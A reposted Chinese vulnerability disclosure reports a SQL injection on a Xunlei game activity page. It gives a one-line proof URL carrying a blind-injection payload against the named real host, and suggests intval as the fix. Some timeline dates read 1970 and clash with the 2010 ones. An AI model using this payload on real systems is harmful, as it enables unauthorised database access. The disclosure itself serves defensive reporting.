迅雷某页面存在sql注入漏洞
生活随笔
收集整理的這篇文章主要介紹了
迅雷某页面存在sql注入漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
漏洞詳情
披露狀態:
2010-07-21: 細節已通知廠商并且等待廠商處理中
1970-01-01: 廠商已經確認,細節僅向廠商公開
1970-01-11: 細節向核心白帽子及相關領域專家公開
1970-01-21: 細節向普通白帽子公開
1970-01-31: 細節向實習白帽子公開
2010-08-20: 細節向公眾公開
簡要描述:
可以做判斷、使用函數等,更多利用請自行分析
詳細說明:
game頻道下某活動頁面
漏洞證明:
http://active.game.xunlei.com/moli/preview.php?id=862/%28cAse%20wHeN%20substRing%28verSion%28%29,1,1%29=5%20THen%201%20Else%200%20End%29
修復方案:
intval
總結
以上是生活随笔為你收集整理的迅雷某页面存在sql注入漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: JS加密方式
- 下一篇: 八大古都大排名(权威版)